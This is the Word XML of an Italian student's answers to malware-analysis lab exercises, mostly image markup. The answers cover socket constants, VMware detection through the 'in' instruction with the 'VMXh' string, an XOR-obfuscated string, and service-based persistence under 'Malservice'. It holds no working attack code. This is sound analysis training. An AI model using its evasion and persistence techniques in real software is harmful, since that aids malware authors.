            <wp:extent cx="6645910" cy="1747520"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="800175364"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5364" name="Immagine 8" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId236"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1747520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="586C8E3A" w14:textId="579924CE" w:rsidR="0030712C" w:rsidRDefault="0030712C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925D598" w14:textId="374B42B8" w:rsidR="0030712C" w:rsidRDefault="008800D6" w:rsidP="008800D6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="008800D6">
        <w:lastRenderedPageBreak/>
        <w:t>Utilizzando la pagina MSDN per il socket e la funzionalità delle costanti simboliche denominate in IDA Pro, puoi rendere i parametri più significativi? Quali sono i parametri dopo aver applicato le modifiche?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EFFCDF" w14:textId="3085A39A" w:rsidR="004231E3" w:rsidRDefault="00CF34DD" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ricercando sulla pagina </w:t>
      </w:r>
      <w:hyperlink r:id="rId237" w:history="1">
        <w:r w:rsidRPr="00AE0262">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-socket</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> scopriamo che</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA3C546" w14:textId="197E14C8" w:rsidR="008800D6" w:rsidRDefault="002821CD" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AF 2 sta per AF_INET </w:t>
      </w:r>
      <w:r w:rsidR="006C50E6">
        <w:t>IPV4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36DFF6" w14:textId="41CED80A" w:rsidR="006C50E6" w:rsidRDefault="006C50E6" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Type 1 sta per SOCK_STREAM</w:t>
      </w:r>
      <w:r w:rsidR="00F8500A">
        <w:t>, q</w:t>
      </w:r>
      <w:r w:rsidR="00F8500A" w:rsidRPr="00F8500A">
        <w:t>uesto tipo di socket utilizza il protocollo TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB730F" w14:textId="1D9EC5A6" w:rsidR="00FE5E9E" w:rsidRDefault="00FE5E9E" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol 6 </w:t>
      </w:r>
      <w:r w:rsidR="00863F35" w:rsidRPr="00863F35">
        <w:t>IPPROTO_TCP</w:t>
      </w:r>
      <w:r w:rsidR="00863F35">
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidR="00863F35" w:rsidRPr="00863F35">
        <w:t>Il protocollo di controllo della trasmissione (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A231648" w14:textId="77777777" w:rsidR="00CF34DD" w:rsidRDefault="00CF34DD" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E63EAE" w14:textId="240B3B00" w:rsidR="00F62C86" w:rsidRDefault="00C57C20" w:rsidP="00C57C20">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57C20">
        <w:t>Cerca l'utilizzo dell'istruzione in (codice operativo 0xED). Questa istruzione viene utilizzata con una stringa magica VMXh per eseguire il rilevamento di VMware. È in uso in questo malware? Utilizzando i riferimenti incrociati alla funzione che esegue l'istruzione in, ci sono ulteriori prove del rilevamento di VMware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D907D5D" w14:textId="2519E6CD" w:rsidR="00C57C20" w:rsidRDefault="00EC1787" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB80602" wp14:editId="5265FF62">
            <wp:extent cx="6645910" cy="299085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="2129366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6120" name="Immagine 2129366120"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId238"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="299085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A304C5" w14:textId="6C028943" w:rsidR="002264A7" w:rsidRDefault="002264A7" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A93606" wp14:editId="2B5A7F3D">
            <wp:extent cx="6645910" cy="2630805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1210350113"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0113" name="Immagine 10" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId239"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2630805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D0E73" w14:textId="07900B7E" w:rsidR="002264A7" w:rsidRDefault="004956B8" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Nel caso venga rilevata una virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="008011E8">
        <w:t xml:space="preserve"> l’installazione viene cancellata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25942E04" w14:textId="712DAAE4" w:rsidR="008011E8" w:rsidRDefault="008011E8" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0001E76A" wp14:editId="5E39B9C7">
            <wp:extent cx="6645910" cy="1787525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="31168859" name="Immagine 1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859" name="Immagine 11" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId240"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1787525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CB9A13" w14:textId="7EAD7A8D" w:rsidR="004D79D7" w:rsidRDefault="004D79D7" w:rsidP="004D79D7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="004D79D7">
        <w:lastRenderedPageBreak/>
        <w:t>Passa il cursore a 0x1001D988. Cosa trovi?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C16B2" w14:textId="4535EA7C" w:rsidR="004D79D7" w:rsidRDefault="00F92BAC" w:rsidP="00D22C0D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40716C51" wp14:editId="281981D3">
            <wp:extent cx="2768600" cy="5136253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="837684656" name="Immagine 12" descr="Immagine che contiene schermata, testo,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656" name="Immagine 12" descr="Immagine che contiene schermata, testo, linea, Rettangolo&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId241"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2779657" cy="5156765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18A534" w14:textId="0AF89D6E" w:rsidR="00F92BAC" w:rsidRDefault="00D22C0D" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Troviamo dati apparentemente senza senso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A2D44D" w14:textId="3E0DE2CE" w:rsidR="00D22C0D" w:rsidRDefault="007500B5" w:rsidP="003606AB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="007500B5">
        <w:t>Se hai installato il plug-in IDA Python (incluso nella versione commerciale di IDA Pro), esegui Lab05-01.py, uno script Python IDA Pro fornito con il malware per questo libro. (Assicurati che il cursore sia su 0x1001D988.) Cosa succede dopo aver eseguito lo script?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6B787" w14:textId="2C7797E6" w:rsidR="000E6984" w:rsidRDefault="003606AB" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Non è stato possibile eseguire lo script attraverso IDA poiché non siamo in possesso di una versione Pro. Di seguito analizziamo lo script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F064C9C" w14:textId="26FACB3B" w:rsidR="003606AB" w:rsidRDefault="003606AB" w:rsidP="003606AB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E5360D5" wp14:editId="76138F22">
            <wp:extent cx="3496733" cy="1678136"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="873991757" name="Immagine 1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1757" name="Immagine 13" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId242"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3514089" cy="1686465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A974D4" w14:textId="0ED9EBD6" w:rsidR="0045494D" w:rsidRDefault="0045494D" w:rsidP="0045494D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0045494D">
        <w:lastRenderedPageBreak/>
        <w:t>Con il cursore nella stessa posizione, come si trasformano questi dati in una singola stringa ASCII?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61437C6A" w14:textId="77777777" w:rsidR="0045494D" w:rsidRDefault="0045494D" w:rsidP="003606AB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B75261" w14:textId="0F4D1D6A" w:rsidR="003606AB" w:rsidRDefault="0047172C" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6E36E3" wp14:editId="649F5D24">
            <wp:extent cx="6645910" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="796385718"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5718" name="Immagine 14" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId243"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC029D" w14:textId="5150673A" w:rsidR="00D22C0D" w:rsidRDefault="004C4D14" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1494F04B" wp14:editId="7562B83E">
            <wp:extent cx="6645910" cy="3133090"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="607249540" name="Immagine 1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9540" name="Immagine 17" descr="Immagine che contiene testo, schermata, software&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId244"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3133090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3313B6" w14:textId="2183B7E4" w:rsidR="00D860CF" w:rsidRDefault="00A3002E" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Decifrando la stringa trovata con la xor otteniamo il messaggio in figura</w:t>
      </w:r>
      <w:r w:rsidR="008F4D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F2E17" w14:textId="4677CB92" w:rsidR="008F4D27" w:rsidRDefault="008F4D27">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C580B22" w14:textId="77777777" w:rsidR="005552D3" w:rsidRDefault="00963B10" w:rsidP="005552D3">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc140165830"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.3 Lab07-01</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="36DF709A" w14:textId="5EB3CDDB" w:rsidR="00F74647" w:rsidRPr="00F74647" w:rsidRDefault="00C03F86" w:rsidP="00F74647">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Persistance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF95F4F" w14:textId="7BCA5627" w:rsidR="005552D3" w:rsidRDefault="00BB624D" w:rsidP="007F2C69">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29BE052C" wp14:editId="6F9C819C">
            <wp:extent cx="4092606" cy="1742729"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1041805773"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5773" name="Immagine 2" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId245"/>
                    <a:srcRect l="6880" r="14120" b="17430"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4121287" cy="1754942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA630C" w14:textId="77777777" w:rsidR="00F74647" w:rsidRPr="00F74647" w:rsidRDefault="00F74647" w:rsidP="00F74647">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC9881C" w14:textId="559CAA9F" w:rsidR="008F4D27" w:rsidRDefault="004313BB" w:rsidP="00083AC2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48EE39A8" wp14:editId="44374EFF">
            <wp:extent cx="5042516" cy="5521908"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="131482513"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513" name="Immagine 1" descr="Immagine che contiene testo, schermata, diagramma, Parallelo&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId246"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5059514" cy="5540522"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F50FBD2" w14:textId="1952581A" w:rsidR="004313BB" w:rsidRDefault="004313BB" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D326AB7" w14:textId="332A34FD" w:rsidR="00FF5E9E" w:rsidRDefault="00B40F85" w:rsidP="00D21117">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="753F8ECC" wp14:editId="10F87A4E">
            <wp:extent cx="3979701" cy="2814221"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="408214909" name="Immagine 4"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4909" name="Immagine 4" descr="Immagine che contiene testo, diagramma, schermata, design&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId247"/>
                    <a:srcRect l="21106" t="17216" r="22575"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3982811" cy="2816420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E1FDA" w14:textId="766E450E" w:rsidR="0042544E" w:rsidRDefault="0042544E" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Network based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F4A230" w14:textId="273A3F66" w:rsidR="00B40F85" w:rsidRDefault="0042544E" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="009EF8B6" wp14:editId="37D0BCAB">
            <wp:extent cx="6645910" cy="4101465"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="357107784" name="Immagine 5"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7784" name="Immagine 5" descr="Immagine che contiene testo, numero, Carattere, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId248"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4101465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F676819" w14:textId="77777777" w:rsidR="00C03F86" w:rsidRDefault="00C03F86" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314C920D" w14:textId="77777777" w:rsidR="00C03F86" w:rsidRDefault="00C03F86" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6B9E3D" w14:textId="77777777" w:rsidR="00C03F86" w:rsidRDefault="00C03F86" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B5533F" w14:textId="77777777" w:rsidR="00C03F86" w:rsidRDefault="00C03F86" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2C4A4F" w14:textId="77777777" w:rsidR="00C03F86" w:rsidRDefault="00C03F86" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055FE800" w14:textId="7A6BFC19" w:rsidR="00AB64C5" w:rsidRDefault="00AB64C5" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C999D73" w14:textId="38464976" w:rsidR="0042544E" w:rsidRDefault="00AB64C5" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B7D156C" wp14:editId="0E3A0CE5">
            <wp:extent cx="6645910" cy="7244715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1878298882" name="Immagine 6"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8882" name="Immagine 6" descr="Immagine che contiene testo, schermata, Parallelo, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId249"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="7244715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9CD22" w14:textId="77777777" w:rsidR="00AB64C5" w:rsidRDefault="00AB64C5" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A1FE50" w14:textId="77777777" w:rsidR="00AB64C5" w:rsidRDefault="00AB64C5" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DC6F7A" w14:textId="77777777" w:rsidR="00083AC2" w:rsidRDefault="00083AC2" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AAE999" w14:textId="77777777" w:rsidR="00083AC2" w:rsidRDefault="00083AC2" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3515634D" w14:textId="77777777" w:rsidR="00083AC2" w:rsidRDefault="00083AC2" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FDC1DB" w14:textId="208BD5FB" w:rsidR="00083AC2" w:rsidRDefault="00D21117" w:rsidP="00D21117">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00D21117">
        <w:t>1) In che modo questo programma garantisce che continui a funzionare (raggiunge la persistenza) quando il computer viene riavviato?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7075A3F1" w14:textId="3302EEC1" w:rsidR="00D21117" w:rsidRDefault="00391822" w:rsidP="00391822">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00391822">
        <w:t>Il malware raggiunge la persistenza creando un servizio denominato Malservice</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0EE56" w14:textId="4A219997" w:rsidR="00391822" w:rsidRDefault="004267EB" w:rsidP="004267EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
